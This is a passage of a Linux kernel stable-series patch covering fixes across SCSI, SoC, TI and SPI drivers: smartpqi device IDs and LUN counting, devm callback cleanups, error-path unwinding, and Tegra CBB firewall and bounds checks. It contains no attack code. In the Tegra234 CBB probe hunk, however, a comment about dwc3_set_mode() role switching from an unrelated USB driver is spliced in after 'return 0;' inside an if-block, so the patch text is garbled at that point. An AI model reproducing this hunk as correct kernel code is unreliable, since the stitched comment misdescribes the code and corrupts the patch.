+-		existing_device->multi_lun_device_lun_count = new_device->multi_lun_device_lun_count;
+-		if (existing_device->multi_lun_device_lun_count == 0)
+-			existing_device->multi_lun_device_lun_count = 1;
+ 	}
+ }
+ 
+@@ -6484,6 +6493,12 @@ static void pqi_slave_destroy(struct scsi_device *sdev)
+ 		return;
+ 	}
+ 
++	device->lun_count--;
++	if (device->lun_count > 0) {
++		mutex_unlock(&ctrl_info->scan_mutex);
++		return;
++	}
++
+ 	spin_lock_irqsave(&ctrl_info->scsi_device_list_lock, flags);
+ 	list_del(&device->scsi_device_list_entry);
+ 	spin_unlock_irqrestore(&ctrl_info->scsi_device_list_lock, flags);
+@@ -9302,6 +9317,10 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x193d, 0x1109)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x193d, 0x110b)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x193d, 0x8460)
+@@ -9402,6 +9421,22 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x1bd4, 0x0072)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0086)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0087)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0088)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0089)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x19e5, 0xd227)
+@@ -9650,6 +9685,10 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x1474)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       PCI_VENDOR_ID_ADAPTEC2, 0x1475)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x1480)
+@@ -9706,6 +9745,14 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x14c2)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       PCI_VENDOR_ID_ADAPTEC2, 0x14c3)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       PCI_VENDOR_ID_ADAPTEC2, 0x14c4)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x14d0)
+@@ -9942,6 +9989,18 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_LENOVO, 0x0623)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++				0x1e93, 0x1000)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++				0x1e93, 0x1001)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++				0x1e93, 0x1002)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_ANY_ID, PCI_ANY_ID)
+diff --git a/drivers/scsi/snic/snic_disc.c b/drivers/scsi/snic/snic_disc.c
+index 9b2b5f8c23b9a..8fbf3c1b1311d 100644
+--- a/drivers/scsi/snic/snic_disc.c
++++ b/drivers/scsi/snic/snic_disc.c
+@@ -304,6 +304,9 @@ snic_tgt_create(struct snic *snic, struct snic_tgt_id *tgtid)
+ 			      ret);
+ 
+ 		put_device(&snic->shost->shost_gendev);
++		spin_lock_irqsave(snic->shost->host_lock, flags);
++		list_del(&tgt->list);
++		spin_unlock_irqrestore(snic->shost->host_lock, flags);
+ 		kfree(tgt);
+ 		tgt = NULL;
+ 
+diff --git a/drivers/soc/apple/rtkit.c b/drivers/soc/apple/rtkit.c
+index 031ec4aa06d55..8ec74d7539eb4 100644
+--- a/drivers/soc/apple/rtkit.c
++++ b/drivers/soc/apple/rtkit.c
+@@ -926,8 +926,10 @@ int apple_rtkit_wake(struct apple_rtkit *rtk)
+ }
+ EXPORT_SYMBOL_GPL(apple_rtkit_wake);
+ 
+-static void apple_rtkit_free(struct apple_rtkit *rtk)
++static void apple_rtkit_free(void *data)
+ {
++	struct apple_rtkit *rtk = data;
++
+ 	mbox_free_channel(rtk->mbox_chan);
+ 	destroy_workqueue(rtk->wq);
+ 
+@@ -950,8 +952,7 @@ struct apple_rtkit *devm_apple_rtkit_init(struct device *dev, void *cookie,
+ 	if (IS_ERR(rtk))
+ 		return rtk;
+ 
+-	ret = devm_add_action_or_reset(dev, (void (*)(void *))apple_rtkit_free,
+-				       rtk);
++	ret = devm_add_action_or_reset(dev, apple_rtkit_free, rtk);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+diff --git a/drivers/soc/apple/sart.c b/drivers/soc/apple/sart.c
+index 83804b16ad03d..afa1117368997 100644
+--- a/drivers/soc/apple/sart.c
++++ b/drivers/soc/apple/sart.c
+@@ -164,6 +164,11 @@ static int apple_sart_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
++static void apple_sart_put_device(void *dev)
++{
++	put_device(dev);
++}
++
+ struct apple_sart *devm_apple_sart_get(struct device *dev)
+ {
+ 	struct device_node *sart_node;
+@@ -187,7 +192,7 @@ struct apple_sart *devm_apple_sart_get(struct device *dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 	}
+ 
+-	ret = devm_add_action_or_reset(dev, (void (*)(void *))put_device,
++	ret = devm_add_action_or_reset(dev, apple_sart_put_device,
+ 				       &sart_pdev->dev);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+diff --git a/drivers/soc/mediatek/mtk-pm-domains.c b/drivers/soc/mediatek/mtk-pm-domains.c
+index 09e3c38b84664..474b272f9b02d 100644
+--- a/drivers/soc/mediatek/mtk-pm-domains.c
++++ b/drivers/soc/mediatek/mtk-pm-domains.c
+@@ -275,9 +275,9 @@ static int scpsys_power_off(struct generic_pm_domain *genpd)
+ 	clk_bulk_disable_unprepare(pd->num_subsys_clks, pd->subsys_clks);
+ 
+ 	/* subsys power off */
+-	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_RST_B_BIT);
+ 	regmap_set_bits(scpsys->base, pd->data->ctl_offs, PWR_ISO_BIT);
+ 	regmap_set_bits(scpsys->base, pd->data->ctl_offs, PWR_CLK_DIS_BIT);
++	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_RST_B_BIT);
+ 	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_ON_2ND_BIT);
+ 	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_ON_BIT);
+ 
+diff --git a/drivers/soc/qcom/apr.c b/drivers/soc/qcom/apr.c
+index b4046f393575e..cd44f17dad3d0 100644
+--- a/drivers/soc/qcom/apr.c
++++ b/drivers/soc/qcom/apr.c
+@@ -454,11 +454,19 @@ static int apr_add_device(struct device *dev, struct device_node *np,
+ 	adev->dev.driver = NULL;
+ 
+ 	spin_lock(&apr->svcs_lock);
+-	idr_alloc(&apr->svcs_idr, svc, svc_id, svc_id + 1, GFP_ATOMIC);
++	ret = idr_alloc(&apr->svcs_idr, svc, svc_id, svc_id + 1, GFP_ATOMIC);
+ 	spin_unlock(&apr->svcs_lock);
++	if (ret < 0) {
++		dev_err(dev, "idr_alloc failed: %d\n", ret);
++		goto out;
++	}
+ 
+-	of_property_read_string_index(np, "qcom,protection-domain",
+-				      1, &adev->service_path);
++	ret = of_property_read_string_index(np, "qcom,protection-domain",
++					    1, &adev->service_path);
++	if (ret < 0) {
++		dev_err(dev, "Failed to read second value of qcom,protection-domain\n");
++		goto out;
++	}
+ 
+ 	dev_info(dev, "Adding APR/GPR dev: %s\n", dev_name(&adev->dev));
+ 
+@@ -468,6 +476,7 @@ static int apr_add_device(struct device *dev, struct device_node *np,
+ 		put_device(&adev->dev);
+ 	}
+ 
++out:
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 8b7e8118f3cec..82c3cfdcc5601 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -849,7 +849,7 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err;
+ 
+-	drv_data->ecc_irq = platform_get_irq(pdev, 0);
++	drv_data->ecc_irq = platform_get_irq_optional(pdev, 0);
+ 	if (drv_data->ecc_irq >= 0) {
+ 		llcc_edac = platform_device_register_data(&pdev->dev,
+ 						"qcom_llcc_edac", -1, drv_data,
+diff --git a/drivers/soc/sifive/sifive_ccache.c b/drivers/soc/sifive/sifive_ccache.c
+index 1c171150e878d..3684f5b40a80e 100644
+--- a/drivers/soc/sifive/sifive_ccache.c
++++ b/drivers/soc/sifive/sifive_ccache.c
+@@ -215,20 +215,27 @@ static int __init sifive_ccache_init(void)
+ 	if (!np)
+ 		return -ENODEV;
+ 
+-	if (of_address_to_resource(np, 0, &res))
+-		return -ENODEV;
++	if (of_address_to_resource(np, 0, &res)) {
++		rc = -ENODEV;
++		goto err_node_put;
++	}
+ 
+ 	ccache_base = ioremap(res.start, resource_size(&res));
+-	if (!ccache_base)
+-		return -ENOMEM;
++	if (!ccache_base) {
++		rc = -ENOMEM;
++		goto err_node_put;
++	}
+ 
+-	if (of_property_read_u32(np, "cache-level", &level))
+-		return -ENOENT;
++	if (of_property_read_u32(np, "cache-level", &level)) {
++		rc = -ENOENT;
++		goto err_unmap;
++	}
+ 
+ 	intr_num = of_property_count_u32_elems(np, "interrupts");
+ 	if (!intr_num) {
+ 		pr_err("No interrupts property\n");
+-		return -ENODEV;
++		rc = -ENODEV;
++		goto err_unmap;
+ 	}
+ 
+ 	for (i = 0; i < intr_num; i++) {
+@@ -237,9 +244,10 @@ static int __init sifive_ccache_init(void)
+ 				 NULL);
+ 		if (rc) {
+ 			pr_err("Could not request IRQ %d\n", g_irq[i]);
+-			return rc;
++			goto err_free_irq;
+ 		}
+ 	}
++	of_node_put(np);
+ 
+ 	ccache_config_read();
+ 
+@@ -250,6 +258,15 @@ static int __init sifive_ccache_init(void)
+ 	setup_sifive_debug();
+ #endif
+ 	return 0;
++
++err_free_irq:
++	while (--i >= 0)
++		free_irq(g_irq[i], NULL);
++err_unmap:
++	iounmap(ccache_base);
++err_node_put:
++	of_node_put(np);
++	return rc;
+ }
+ 
+ device_initcall(sifive_ccache_init);
+diff --git a/drivers/soc/tegra/cbb/tegra194-cbb.c b/drivers/soc/tegra/cbb/tegra194-cbb.c
+index 1ae0bd9a1ac1b..2e952c6f7c9e3 100644
+--- a/drivers/soc/tegra/cbb/tegra194-cbb.c
++++ b/drivers/soc/tegra/cbb/tegra194-cbb.c
+@@ -102,8 +102,6 @@
+ #define CLUSTER_NOC_VQC GENMASK(17, 16)
+ #define CLUSTER_NOC_MSTR_ID GENMASK(21, 18)
+ 
+-#define USRBITS_MSTR_ID GENMASK(21, 18)
+-
+ #define CBB_ERR_OPC GENMASK(4, 1)
+ #define CBB_ERR_ERRCODE GENMASK(10, 8)
+ #define CBB_ERR_LEN1 GENMASK(27, 16)
+@@ -2038,15 +2036,17 @@ static irqreturn_t tegra194_cbb_err_isr(int irq, void *data)
+ 					    smp_processor_id(), priv->noc->name, priv->res->start,
+ 					    irq);
+ 
+-			mstr_id =  FIELD_GET(USRBITS_MSTR_ID, priv->errlog5) - 1;
+ 			is_fatal = print_errlog(NULL, priv, status);
+ 
+ 			/*
+-			 * If illegal request is from CCPLEX(0x1)
+-			 * initiator then call BUG() to crash system.
++			 * If illegal request is from CCPLEX(0x1) initiator
++			 * and error is fatal then call BUG() to crash system.
+ 			 */
+-			if ((mstr_id == 0x1) && priv->noc->erd_mask_inband_err)
+-				is_inband_err = 1;
++			if (priv->noc->erd_mask_inband_err) {
++				mstr_id =  FIELD_GET(CBB_NOC_MSTR_ID, priv->errlog5);
++				if (mstr_id == 0x1)
++					is_inband_err = 1;
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/soc/tegra/cbb/tegra234-cbb.c b/drivers/soc/tegra/cbb/tegra234-cbb.c
+index 3528f9e15d5c0..f33d094e5ea60 100644
+--- a/drivers/soc/tegra/cbb/tegra234-cbb.c
++++ b/drivers/soc/tegra/cbb/tegra234-cbb.c
+@@ -72,6 +72,11 @@
+ 
+ #define REQ_SOCKET_ID			GENMASK(27, 24)
+ 
++#define CCPLEX_MSTRID			0x1
++#define FIREWALL_APERTURE_SZ		0x10000
++/* Write firewall check enable */
++#define WEN				0x20000
++
+ enum tegra234_cbb_fabric_ids {
+ 	CBB_FAB_ID,
+ 	SCE_FAB_ID,
+@@ -92,11 +97,15 @@ struct tegra234_slave_lookup {
+ struct tegra234_cbb_fabric {
+ 	const char *name;
+ 	phys_addr_t off_mask_erd;
+-	bool erd_mask_inband_err;
++	phys_addr_t firewall_base;
++	unsigned int firewall_ctl;
++	unsigned int firewall_wr_ctl;
+ 	const char * const *master_id;
+ 	unsigned int notifier_offset;
+ 	const struct tegra_cbb_error *errors;
++	const int max_errors;
+ 	const struct tegra234_slave_lookup *slave_map;
++	const int max_slaves;
+ };
+ 
+ struct tegra234_cbb {
+@@ -128,6 +137,44 @@ static inline struct tegra234_cbb *to_tegra234_cbb(struct tegra_cbb *cbb)
+ static LIST_HEAD(cbb_list);
+ static DEFINE_SPINLOCK(cbb_lock);
+ 
++static bool
++tegra234_cbb_write_access_allowed(struct platform_device *pdev, struct tegra234_cbb *cbb)
++{
++	u32 val;
++
++	if (!cbb->fabric->firewall_base ||
++	    !cbb->fabric->firewall_ctl ||
++	    !cbb->fabric->firewall_wr_ctl) {
++		dev_info(&pdev->dev, "SoC data missing for firewall\n");
++		return false;
++	}
++
++	if ((cbb->fabric->firewall_ctl > FIREWALL_APERTURE_SZ) ||
++	    (cbb->fabric->firewall_wr_ctl > FIREWALL_APERTURE_SZ)) {
++		dev_err(&pdev->dev, "wrong firewall offset value\n");
++		return false;
++	}
++
++	val = readl(cbb->regs + cbb->fabric->firewall_base + cbb->fabric->firewall_ctl);
++	/*
++	 * If the firewall check feature for allowing or blocking the
++	 * write accesses through the firewall of a fabric is disabled
++	 * then CCPLEX can write to the registers of that fabric.
++	 */
++	if (!(val & WEN))
++		return true;
++
++	/*
++	 * If the firewall check is enabled then check whether CCPLEX
++	 * has write access to the fabric's error notifier registers
++	 */
++	val = readl(cbb->regs + cbb->fabric->firewall_base + cbb->fabric->firewall_wr_ctl);
++	if (val & (BIT(CCPLEX_MSTRID)))
++		return true;
++
++	return false;
++}
++
+ static void tegra234_cbb_fault_enable(struct tegra_cbb *cbb)
+ {
+ 	struct tegra234_cbb *priv = to_tegra234_cbb(cbb);
+@@ -271,6 +318,12 @@ static void tegra234_cbb_print_error(struct seq_file *file, struct tegra234_cbb
+ 		tegra_cbb_print_err(file, "\t  Multiple type of errors reported\n");
+ 
+ 	while (status) {
++		if (type >= cbb->fabric->max_errors) {
++			tegra_cbb_print_err(file, "\t  Wrong type index:%u, status:%u\n",
++					    type, status);
++			return;
++		}
++
+ 		if (status & 0x1)
+ 			tegra_cbb_print_err(file, "\t  Error Code\t\t: %s\n",
+ 					    cbb->fabric->errors[type].code);
+@@ -282,6 +335,12 @@ static void tegra234_cbb_print_error(struct seq_file *file, struct tegra234_cbb
+ 	type = 0;
+ 
+ 	while (overflow) {
++		if (type >= cbb->fabric->max_errors) {
++			tegra_cbb_print_err(file, "\t  Wrong type index:%u, overflow:%u\n",
++					    type, overflow);
++			return;
++		}
++
+ 		if (overflow & 0x1)
+ 			tegra_cbb_print_err(file, "\t  Overflow\t\t: Multiple %s\n",
+ 					    cbb->fabric->errors[type].code);
+@@ -334,8 +393,11 @@ static void print_errlog_err(struct seq_file *file, struct tegra234_cbb *cbb)
+ 	access_type = FIELD_GET(FAB_EM_EL_ACCESSTYPE, cbb->mn_attr0);
+ 
+ 	tegra_cbb_print_err(file, "\n");
+-	tegra_cbb_print_err(file, "\t  Error Code\t\t: %s\n",
+-			    cbb->fabric->errors[cbb->type].code);
++	if (cbb->type < cbb->fabric->max_errors)
++		tegra_cbb_print_err(file, "\t  Error Code\t\t: %s\n",
++				    cbb->fabric->errors[cbb->type].code);
++	else
++		tegra_cbb_print_err(file, "\t  Wrong type index:%u\n", cbb->type);
+ 
+ 	tegra_cbb_print_err(file, "\t  MASTER_ID\t\t: %s\n", cbb->fabric->master_id[mstr_id]);
+ 	tegra_cbb_print_err(file, "\t  Address\t\t: %#llx\n", cbb->access);
+@@ -374,6 +436,11 @@ static void print_errlog_err(struct seq_file *file, struct tegra234_cbb *cbb)
+ 	if ((fab_id == PSC_FAB_ID) || (fab_id == FSI_FAB_ID))
+ 		return;
+ 
++	if (slave_id >= cbb->fabric->max_slaves) {
++		tegra_cbb_print_err(file, "\t  Invalid slave_id:%d\n", slave_id);
++		return;
++	}
++
+ 	if (!strcmp(cbb->fabric->errors[cbb->type].code, "TIMEOUT_ERR")) {
+ 		tegra234_lookup_slave_timeout(file, cbb, slave_id, fab_id);
+ 		return;
+@@ -517,7 +584,7 @@ static irqreturn_t tegra234_cbb_isr(int irq, void *data)
+ 		u32 status = tegra_cbb_get_status(cbb);
+ 
+ 		if (status && (irq == priv->sec_irq)) {
+-			tegra_cbb_print_err(NULL, "CPU:%d, Error: %s@%llx, irq=%d\n",
++			tegra_cbb_print_err(NULL, "CPU:%d, Error: %s@0x%llx, irq=%d\n",
+ 					    smp_processor_id(), priv->fabric->name,
+ 					    priv->res->start, irq);
+ 
+@@ -525,14 +592,14 @@ static irqreturn_t tegra234_cbb_isr(int irq, void *data)
+ 			if (err)
+ 				goto unlock;
+ 
+-			mstr_id =  FIELD_GET(USRBITS_MSTR_ID, priv->mn_user_bits);
+-
+ 			/*
+-			 * If illegal request is from CCPLEX(id:0x1) master then call BUG() to
+-			 * crash system.
++			 * If the illegal request is from the CCPLEX (id: 0x1) master, then WARN().
+ 			 */
+-			if ((mstr_id == 0x1) && priv->fabric->off_mask_erd)
+-				is_inband_err = 1;
++			if (priv->fabric->off_mask_erd) {
++				mstr_id =  FIELD_GET(USRBITS_MSTR_ID, priv->mn_user_bits);
++				if (mstr_id == CCPLEX_MSTRID)
++					is_inband_err = 1;
++			}
+ 		}
+ 	}
+ 
+@@ -640,8 +707,13 @@ static const struct tegra234_cbb_fabric tegra234_aon_fabric = {
+ 	.name = "aon-fabric",
+ 	.master_id = tegra234_master_id,
+ 	.slave_map = tegra234_aon_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_aon_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x17000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x8d0,
++	.firewall_wr_ctl = 0x8c8,
+ };
+ 
+ static const struct tegra234_slave_lookup tegra234_bpmp_slave_map[] = {
+@@ -656,8 +728,13 @@ static const struct tegra234_cbb_fabric tegra234_bpmp_fabric = {
+ 	.name = "bpmp-fabric",
+ 	.master_id = tegra234_master_id,
+ 	.slave_map = tegra234_bpmp_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_bpmp_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x8f0,
++	.firewall_wr_ctl = 0x8e8,
+ };
+ 
+ static const struct tegra234_slave_lookup tegra234_cbb_slave_map[] = {
+@@ -728,55 +805,62 @@ static const struct tegra234_cbb_fabric tegra234_cbb_fabric = {
+ 	.name = "cbb-fabric",
+ 	.master_id = tegra234_master_id,
+ 	.slave_map = tegra234_cbb_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_cbb_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x60000,
+-	.off_mask_erd = 0x3a004
++	.off_mask_erd = 0x3a004,
++	.firewall_base = 0x10000,
++	.firewall_ctl = 0x23f0,
++	.firewall_wr_ctl = 0x23e8,
+ };
+ 
+-static const struct tegra234_slave_lookup tegra234_dce_slave_map[] = {
++static const struct tegra234_slave_lookup tegra234_common_slave_map[] = {
+ 	{ "AXI2APB", 0x00000 },
+ 	{ "AST0",    0x15000 },
+ 	{ "AST1",    0x16000 },
++	{ "CBB",     0x17000 },
++	{ "RSVD",    0x00000 },
+ 	{ "CPU",     0x18000 },
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra234_dce_fabric = {
+ 	.name = "dce-fabric",
+ 	.master_id = tegra234_master_id,
+-	.slave_map = tegra234_dce_slave_map,
++	.slave_map = tegra234_common_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_common_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
+-};
+-
+-static const struct tegra234_slave_lookup tegra234_rce_slave_map[] = {
+-	{ "AXI2APB", 0x00000 },
+-	{ "AST0",    0x15000 },
+-	{ "AST1",    0x16000 },
+-	{ "CPU",     0x18000 },
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x290,
++	.firewall_wr_ctl = 0x288,
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra234_rce_fabric = {
+ 	.name = "rce-fabric",
+ 	.master_id = tegra234_master_id,
+-	.slave_map = tegra234_rce_slave_map,
++	.slave_map = tegra234_common_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_common_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
+-};
+-
+-static const struct tegra234_slave_lookup tegra234_sce_slave_map[] = {
+-	{ "AXI2APB", 0x00000 },
+-	{ "AST0",    0x15000 },
+-	{ "AST1",    0x16000 },
+-	{ "CBB",     0x17000 },
+-	{ "CPU",     0x18000 },
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x290,
++	.firewall_wr_ctl = 0x288,
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra234_sce_fabric = {
+ 	.name = "sce-fabric",
+ 	.master_id = tegra234_master_id,
+-	.slave_map = tegra234_sce_slave_map,
++	.slave_map = tegra234_common_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_common_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x290,
++	.firewall_wr_ctl = 0x288,
+ };
+ 
+ static const char * const tegra241_master_id[] = {
+@@ -889,7 +973,7 @@ static const struct tegra_cbb_error tegra241_cbb_errors[] = {
+ };
+ 
+ static const struct tegra234_slave_lookup tegra241_cbb_slave_map[] = {
+-	{ "CCPLEX",     0x50000 },
++	{ "RSVD",       0x00000 },
+ 	{ "PCIE_C8",    0x51000 },
+ 	{ "PCIE_C9",    0x52000 },
+ 	{ "RSVD",       0x00000 },
+@@ -942,20 +1026,30 @@ static const struct tegra234_slave_lookup tegra241_cbb_slave_map[] = {
+ 	{ "PCIE_C3",    0x58000 },
+ 	{ "PCIE_C0",    0x59000 },
+ 	{ "PCIE_C1",    0x5a000 },
++	{ "CCPLEX",     0x50000 },
+ 	{ "AXI2APB_29", 0x85000 },
+ 	{ "AXI2APB_30", 0x86000 },
++	{ "CBB_CENTRAL", 0x00000 },
++	{ "AXI2APB_31", 0x8E000 },
++	{ "AXI2APB_32", 0x8F000 },
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra241_cbb_fabric = {
+ 	.name = "cbb-fabric",
+ 	.master_id = tegra241_master_id,
+ 	.slave_map = tegra241_cbb_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra241_cbb_slave_map),
+ 	.errors = tegra241_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra241_cbb_errors),
+ 	.notifier_offset = 0x60000,
+ 	.off_mask_erd = 0x40004,
++	.firewall_base = 0x20000,
++	.firewall_ctl = 0x2370,
++	.firewall_wr_ctl = 0x2368,
+ };
+ 
+ static const struct tegra234_slave_lookup tegra241_bpmp_slave_map[] = {
++	{ "RSVD",    0x00000 },
+ 	{ "RSVD",    0x00000 },
+ 	{ "RSVD",    0x00000 },
+ 	{ "CBB",     0x15000 },
+@@ -969,8 +1063,13 @@ static const struct tegra234_cbb_fabric tegra241_bpmp_fabric = {
+ 	.name = "bpmp-fabric",
+ 	.master_id = tegra241_master_id,
+ 	.slave_map = tegra241_bpmp_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra241_bpmp_slave_map),
+ 	.errors = tegra241_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra241_cbb_errors),
+ 	.notifier_offset = 0x19000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x8f0,
++	.firewall_wr_ctl = 0x8e8,
+ };
+ 
+ static const struct of_device_id tegra234_cbb_dt_ids[] = {
+@@ -1055,6 +1154,15 @@ static int tegra234_cbb_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, cbb);
+ 
++	/*
++	 * Don't enable error reporting for a fabric if writes to its
++	 * registers are blocked by the CBB firewall.
++	 */
++	if (!tegra234_cbb_write_access_allowed(pdev, cbb)) {
++		dev_info(&pdev->dev, "error reporting not enabled due to firewall\n");
++		return 0;
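++	/*
++	 * Take a snapshot of the requested role so that a concurrent
++	 * dwc3_set_mode() cannot change it while the switch is in progress.
++	 */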
++	}
++
+ 	spin_lock_irqsave(&cbb_lock, flags);
+ 	list_add(&cbb->base.node, &cbb_list);
+ 	spin_unlock_irqrestore(&cbb_lock, flags);
+diff --git a/drivers/soc/ti/knav_qmss_queue.c b/drivers/soc/ti/knav_qmss_queue.c
+index 92af7d1b6f5bd..8fb76908be704 100644
+--- a/drivers/soc/ti/knav_qmss_queue.c
++++ b/drivers/soc/ti/knav_qmss_queue.c
+@@ -67,7 +67,7 @@ static DEFINE_MUTEX(knav_dev_lock);
+  * Newest followed by older ones. Search is done from start of the array
+  * until a firmware file is found.
+  */
+-const char *knav_acc_firmwares[] = {"ks2_qmss_pdsp_acc48.bin"};
++static const char * const knav_acc_firmwares[] = {"ks2_qmss_pdsp_acc48.bin"};
+ 
+ static bool device_ready;
+ bool knav_qmss_device_ready(void)
+@@ -1785,6 +1785,7 @@ static int knav_queue_probe(struct platform_device *pdev)
+ 	pm_runtime_enable(&pdev->dev);
+ 	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret < 0) {
++		pm_runtime_disable(&pdev->dev);
+ 		dev_err(dev, "Failed to enable QMSS\n");
+ 		return ret;
+ 	}
+diff --git a/drivers/soc/ti/smartreflex.c b/drivers/soc/ti/smartreflex.c
+index ad2bb72e640c8..6a389a6444f36 100644
+--- a/drivers/soc/ti/smartreflex.c
++++ b/drivers/soc/ti/smartreflex.c
+@@ -932,6 +932,7 @@ static int omap_sr_probe(struct platform_device *pdev)
+ err_debugfs:
+ 	debugfs_remove_recursive(sr_info->dbg_dir);
+ err_list_del:
++	pm_runtime_disable(&pdev->dev);
+ 	list_del(&sr_info->node);
+ 	clk_unprepare(sr_info->fck);
+ 
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 731624f157fc0..93152144fd2ec 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -333,13 +333,26 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ {
+ 	struct mpc8xxx_spi *mpc8xxx_spi = spi_controller_get_devdata(ctlr);
+ 	struct spi_transfer *t;
++	struct spi_transfer *first;
++
++	first = list_first_entry(&m->transfers, struct spi_transfer,
++				 transfer_list);
+ 
+ 	/*
+ 	 * In CPU mode, optimize large byte transfers to use larger
+ 	 * bits_per_word values to reduce number of interrupts taken.
++	 *
++	 * Some glitches can appear on the SPI clock when the mode changes.
++	 * Check that the speed does not change across the transfers of the
++	 * message, and set it up now so the mode changes while no chip select
++	 * is asserted.
+ 	 */
+-	if (!(mpc8xxx_spi->flags & SPI_CPM_MODE)) {
+-		list_for_each_entry(t, &m->transfers, transfer_list) {
++	list_for_each_entry(t, &m->transfers, transfer_list) {
++		if (t->speed_hz != first->speed_hz) {
++			dev_err(&m->spi->dev,
++				"speed_hz cannot change during message.\n");
++			return -EINVAL;
++		}
